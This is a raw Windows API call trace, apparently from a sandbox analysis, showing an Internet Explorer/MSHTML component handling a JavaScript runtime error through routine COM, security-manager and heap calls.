GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6542c075, dwHighDateTime=0x1d7d80b)) [0158.813] CoTaskMemAlloc (cb=0x1c) returned 0x6b5d98 [0158.813] wcscpy_s (in: _Destination=0x6b5d98, _SizeInWords=0xe, _Source="Generic error" | out: _Destination="Generic error") returned 0x0 [0158.813] GetUserDefaultLCID () returned 0x409 [0158.814] FindResourceExW (hModule=0x6c9c0000, lpType=0x6, lpName=0x101, wLanguage=0x0) returned 0x7302268 [0158.814] LoadResource (hModule=0x6c9c0000, hResInfo=0x7302268) returned 0x7303f20 [0158.814] LockResource (hResData=0x7303f20) returned 0x7303f20 [0158.814] SizeofResource (hModule=0x6c9c0000, hResInfo=0x7302268) returned 0xb2 [0158.816] GetCurrentThreadId () returned 0xb48 [0158.816] SysStringLen (param_1="JavaScript runtime error") returned 0x18 [0158.816] SysStringLen (param_1="The system cannot locate the resource specified.\r\n") returned 0x32 [0158.817] CoTaskMemFree (pv=0x0) [0158.819] StrCmpNICW (lpStr1="text/", lpStr2="text/", nChar=5) returned 0 [0158.819] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0158.819] GetCurrentThreadId () returned 0xb48 [0158.819] GetCurrentThreadId () returned 0xb48 [0158.822] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19b838 | out: lpPoint=0x19b838) returned 1 [0158.825] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19b838 | out: lpPoint=0x19b838) returned 1 [0158.826] GetCapture () returned 0x0 [0158.826] CoCreateInstance (in: rclsid=0x6d826c30*(Data1=0x7057e952, Data2=0xbd1b, Data3=0x11d1, Data4=([0]=0x89, [1]=0x19, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xc2, [6]=0xc8, [7]=0x36)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d7a1164*(Data1=0xbd3f23c0, Data2=0xd43e, Data3=0x11cf, Data4=([0]=0x89, [1]=0x3b, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0x1a)), ppv=0xd10cc0 | out: ppv=0xd10cc0*=0x6b50c0) returned 0x0 [0158.834] IUnknown:QueryInterface (in: This=0x6b50c0, riid=0x6d72bc34*(Data1=0xb722bccb, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), ppvObject=0x19b854 | out: ppvObject=0x19b854*=0x6b50cc) returned 0x0 [0158.835] IOleCommandTarget:Exec (in: This=0x6b50cc, pguidCmdGroup=0x6d7a2be4, nCmdID=0x28, nCmdexecopt=0x0, pvaIn=0x19b830*(varType=0xd, wReserved1=0xd3, wReserved2=0x1b6a, wReserved3=0xd6c9, varVal1=0xd0a370, varVal2=0x19b9b4), pvaOut=0x19b840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0) | out: pvaOut=0x19b840*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x0 [0158.835] IUnknown:QueryInterface (in: This=0xd0a370, riid=0x6ed20660*(Data1=0x112, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19a624 | out: ppvObject=0x19a624*=0xcf8930) returned 0x0 [0158.835] IInternetHostSecurityManager:ProcessUrlAction (in: This=0xcf8930, dwAction=0x19a628, pPolicy=0x19b840, cbPolicy=0x19a6bc, pContext=0x19b840*=0x0, cbContext=0x6ed0e51c, dwFlags=0xcf8930, dwReserved=0x0 | out: pPolicy=0x19b840*=0x0) returned 0x0 [0158.835] IUnknown:QueryInterface (in: This=0x6e8967a4, riid=0x6ed0e51c*(Data1=0x119, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19a660 | out: ppvObject=0x19a660*=0x6e8967b0) returned 0x0 [0158.836] IUnknown:Release (This=0x6e8967a4) returned 0x9 [0158.836] IUnknown:Release (This=0xcf8930) returned 0x0 [0158.836] IOleInPlaceSite:GetWindowContext (in: This=0x6e8967b0, ppFrame=0x19a698, ppDoc=0x19a65c, lprcPosRect=0x19a674, lprcClipRect=0x19a664, lpFrameInfo=0x19a644 | out: ppFrame=0x19a698*=0x6e89679c, ppDoc=0x19a65c*=0x6e89679c, lprcPosRect=0x19a674, lprcClipRect=0x19a664, lpFrameInfo=0x19a644) returned 0x0 [0158.836] GetClientRect (in: hWnd=0x70258, lpRect=0x19a674 | out: lpRect=0x19a674) returned 1 [0158.836] IUnknown:Release (This=0x6e89679c) returned 0x8 [0158.836] IUnknown:Release (This=0x6e8967b0) returned 0x7 [0158.836] IOleWindow:GetWindow (in: This=0x6e89679c, phwnd=0x19a6bc | out: phwnd=0x19a6bc) returned 0x0 [0158.836] IUnknown:Release (This=0x6e89679c) returned 0x6 [0158.837] IUnknown:QueryInterface (in: This=0xd0a370, riid=0x6ed1c29c*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x19a698 | out: ppvObject=0x19a698*=0xcf8930) returned 0x0 [0158.837] IHTMLDocument2:get_parentWindow (in: This=0xcf8930, p=0x19a694 | out: p=0x19a694*=0xcfc1fc) returned 0x0 [0158.838] IHTMLWindow2:get_event (in: This=0xcfc1fc, p=0x19a6c4 | out: p=0x19a6c4*=0xcf8960) returned 0x0 [0158.838] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.838] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.839] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.840] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x26) returned 0x687140 [0158.841] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.841] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.841] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.841] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.841] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.841] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1e) returned 0x6b5de8 [0158.841] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.842] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.842] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.842] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6b5e10 [0158.842] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.842] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.842] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.842] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2a) returned 0x6cedb0 [0158.842] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.842] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.842] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.842] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6b5b90 [0158.842] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.843] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.843] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.843] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.843] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.843] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.843] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.843] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.843] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.843] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.844] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.844] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.844] IUnknown:Release (This=0xcf8930) returned 0x0 [0158.844] IUnknown:Release (This=0xcfc1fc) returned 0x4 [0158.846] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0158.846] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19a2bc | out: ppvObject=0x19a2bc*=0x6e784f9c) returned 0x0 [0158.847] IUnknown:Release (This=0x6e784f90) returned 0x1 [0158.847] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.dlg", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x6d76e0, cchResult=0x824, pcchResult=0x19a5d0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x19a5d0*=0x0) returned 0x800c0011 [0158.847] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0158.851] OleInitialize (pvReserved=0x0) returned 0x1 [0158.852] GetCapture () returned 0x0 [0158.852] ReleaseCapture () returned 1 [0158.852] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.853] IUnknown:AddRef (This=0xcf8960) returned 0x2 [0158.853] GetModuleHandleW (lpModuleName="IERtUtil.dll") returned 0x71af0000 [0158.854] GetProcAddress (hModule=0x71af0000, lpProcName="IEGetProcessModule") returned 0x71d2b8e0 [0158.854] IEGetProcessModule () returned 0x0 [0158.854] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.858] IUnknown:AddRef (This=0x613358) returned 0x2 [0158.858] CoCreateInstance (in: rclsid=0x6d6f6740*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d72c640*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd368b8 | out: ppv=0xd368b8*=0xd11400) returned 0x0 [0158.860] DllGetClassObject (in: rclsid=0x5feeb0*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), riid=0x76db7590*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19959c | out: ppv=0x19959c*=0x6e784a40) returned 0x0 [0158.861] HTMLDocument:IClassFactory:CreateInstance (in: This=0x6e784a40, pUnkOuter=0x0, riid=0x199fd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x199584 | out: ppvObject=0x199584*=0xd11400) returned 0x0 [0158.861] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.861] QueryPerformanceFrequency (in: lpFrequency=0x1994b0 | out: lpFrequency=0x1994b0*=100000000) returned 1 [0158.861] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.861] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.862] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.862] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0158.862] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0158.862] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.862] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.862] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.862] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.862] GetCurrentThreadId () returned 0xb48 [0158.862] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.863] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.863] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.863] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0158.864] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.864] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.865] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.865] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.865] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.865] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.865] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.865] GetCurrentThreadId () returned 0xb48 [0158.865] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.865] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.866] CreateUri (in: pwzURI="about:blank", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x19906c | out: ppURI=0x19906c*=0x5f59d4) returned 0x0 [0158.866] IUri:GetPropertyDWORD (in: This=0x5f59d4, uriProp=0x11, pdwProperty=0x19903c, dwFlags=0x0 | out: pdwProperty=0x19903c*=0x11) returned 0x0 [0158.866] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x19900c, dwReserved=0x0 | out: ppSM=0x19900c*=0x6cdf88) returned 0x0 [0158.866] IUnknown:QueryInterface (in: This=0x6cdf88, riid=0x6d734ed8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x199010 | out: ppvObject=0x199010*=0x6cdf88) returned 0x0 [0158.866] IUnknown:Release (This=0x6cdf88) returned 0x1 [0158.866] IInternetSecurityManager:SetSecuritySite (This=0x6cdf88, pSite=0xd121e4) returned 0x0 [0158.866] IUnknown:AddRef (This=0xd121e4) returned 0x28 [0158.866] IUnknown:QueryInterface (in: This=0xd121e4, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x198fe8 | out: ppvObject=0x198fe8*=0xd121e8) returned 0x0 [0158.867] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0x6cdfbc | out: ppvObject=0x6cdfbc*=0x0) returned 0x80004002 [0158.867] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x6cdfb8 | out: ppvObject=0x6cdfb8*=0x0) returned 0x80004002 [0158.867] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x6cdfb4 | out: ppvObject=0x6cdfb4*=0x0) returned 0x80004002 [0158.867] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x6cdfb0 | out: ppvObject=0x6cdfb0*=0x0) returned 0x80004002 [0158.867] IUnknown:Release (This=0xd121e8) returned 0x0 [0158.867] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0158.872] IUnknown:Release (This=0x6cdf88) returned 0x1 [0158.872] IUnknown:Release (This=0x5f59d4) returned 0x4 [0158.872] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6901f0 [0158.872] memcpy_s (in: _Destination=0x6901f0, _DestinationSize=0x10, _Source=0x1990d0, _SourceSize=0x10 | out: _Destination=0x6901f0) returned 0x0 [0158.872] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x690208 [0158.872] memcpy_s (in: _Destination=0x690208, _DestinationSize=0x10, _Source=0x1990d0, _SourceSize=0x10 | out: _Destination=0x690208) returned 0x0 [0158.872] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0158.873] IUnknown:Release (This=0x6cdf88) returned 0x1 [0158.873] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.873] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.874] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2000) returned 0x6c5c60 [0158.874] memcpy_s (in: _Destination=0x6c5c60, _DestinationSize=0x2000, _Source=0x199268, _SourceSize=0x4 | out: _Destination=0x6c5c60) returned 0x0 [0158.874] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0158.874] CreateUri (in: pwzURI="about:blank", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x199098 | out: ppURI=0x199098*=0x5f59d4) returned 0x0 [0158.874] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0158.875] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0158.875] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0158.875] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x5f59d4, dwAction=0x2106, pPolicy=0x19908c, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x1, dwReserved=0x0, pdwOutFlags=0x19906c | out: pPolicy=0x19908c*=0x0, pdwOutFlags=0x19906c*=0x0) returned 0x0 [0158.875] IUnknown:Release (This=0x6cdf88) returned 0x1 [0158.875] IUnknown:Release (This=0x5f59d4) returned 0x4 [0158.875] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.875] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.876] GetDoubleClickTime () returned 0x1f4 [0158.876] GetSystemMetrics (nIndex=36) returned 4 [0158.876] GetSystemMetrics (nIndex=37) returned 4 [0158.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.876] RtlInitializeConditionVariable () returned 0xcf89e8 [0158.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.877] CoTaskMemAlloc (cb=0x1c) returned 0x6b5c30 [0158.877] QISearch (in: that=0xcf8a50, pqit=0x6d729ed8, riid=0x6d729ee8*(Data1=0xaf11d3db, Data2=0x81a6, Data3=0x4b88, Data4=([0]=0xae, [1]=0x7, [2]=0x96, [3]=0xec, [4]=0xcf, [5]=0x46, [6]=0xd0, [7]=0x76)), ppv=0xd124b0 | out: that=0xcf8a50, ppv=0xd124b0*=0xcf8a50) returned 0x0 [0158.877] IUnknown:AddRef (This=0xcf8a50) returned 0x2 [0158.877] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.877] CoTaskMemAlloc (cb=0x1c) returned 0x6b5c58 [0158.877] QISearch (in: that=0xcf8a80, pqit=0x6d729ed8, riid=0x6d729ee8*(Data1=0xaf11d3db, Data2=0x81a6, Data3=0x4b88, Data4=([0]=0xae, [1]=0x7, [2]=0x96, [3]=0xec, [4]=0xcf, [5]=0x46, [6]=0xd0, [7]=0x76)), ppv=0xd124b4 | out: that=0xcf8a80, ppv=0xd124b4*=0xcf8a80) returned 0x0 [0158.877] IUnknown:AddRef (This=0xcf8a80) returned 0x2 [0158.877] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.878] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.878] GetSystemTimeAdjustment (in: lpTimeAdjustment=0x199484, lpTimeIncrement=0x19948c, lpTimeAdjustmentDisabled=0x199488 | out: lpTimeAdjustment=0x199484, lpTimeIncrement=0x19948c, lpTimeAdjustmentDisabled=0x199488) returned 1 [0158.878] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.878] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.878] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.879] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x46) returned 0x6929a0 [0158.879] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x42) returned 0x6923b0 [0158.879] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x56) returned 0x6b6990 [0158.879] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.879] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.879] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.879] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.880] IUnknown:AddRef (This=0xd11400) returned 0x0 [0158.880] IUnknown:Release (This=0xd11400) returned 0x1 [0158.880] HTMLDocument:IUnknown:Release (This=0x6e784a40) returned 0x1 [0158.880] IUnknown:QueryInterface (in: This=0xd11400, riid=0x6d72c640*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19a3fc | out: ppvObject=0x19a3fc*=0xd11400) returned 0x0 [0158.880] IUnknown:Release (This=0xd11400) returned 0x1 [0158.880] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.886] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x74530000 [0158.887] GetProcAddress (hModule=0x74530000, lpProcName="QueryProtectedPolicy") returned 0x76cf2bc0 [0158.887] QueryProtectedPolicy (in: PolicyGuid=0x6d6fd09c, PolicyValue=0x19a3ec | out: PolicyValue=0x19a3ec) returned 0 [0158.888] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.888] IUnknown_QueryService (in: punk=0xd1e310, guidService=0x6d6f65d4*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x6d720fb8*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0xd11460 | out: ppvOut=0xd11460*=0x0) returned 0x80004002 [0158.888] IUnknown:QueryInterface (in: This=0xd1e310, riid=0x77188260*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x19a388 | out: ppvObject=0x19a388*=0xd1e320) returned 0x0 [0158.889] IServiceProvider:QueryService (in: This=0xd1e320, guidService=0x6d6f65d4*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x6d720fb8*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0xd11460 | out: ppvObject=0xd11460*=0x0) returned 0x80004002 [0158.889] IUnknown:Release (This=0xd1e320) returned 0x0 [0158.889] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.889] IUnknown_QueryService (in: punk=0xd1e310, guidService=0x6d6f6740*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), riid=0x6d6f6740*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), ppvOut=0x19a3a4 | out: ppvOut=0x19a3a4*=0x0) returned 0x80004002 [0158.889] IUnknown:QueryInterface (in: This=0xd1e310, riid=0x77188260*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x19a378 | out: ppvObject=0x19a378*=0xd1e320) returned 0x0 [0158.889] IServiceProvider:QueryService (in: This=0xd1e320, guidService=0x6d6f6740*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), riid=0x6d6f6740*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), ppvObject=0x19a3a4 | out: ppvObject=0x19a3a4*=0x0) returned 0x80004002 [0158.889] IUnknown:Release (This=0xd1e320) returned 0x0 [0158.890] IInternetSecurityManager:SetSecuritySite (This=0x6cdf88, pSite=0xd121e4) returned 0x0 [0158.890] IUnknown:Release (This=0xd121e4) returned 0x0 [0158.890] IUnknown:AddRef (This=0xd121e4) returned 0x30 [0158.890] IUnknown:QueryInterface (in: This=0xd121e4, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x19a3b4 | out: ppvObject=0x19a3b4*=0xd121e8) returned 0x0 [0158.890] 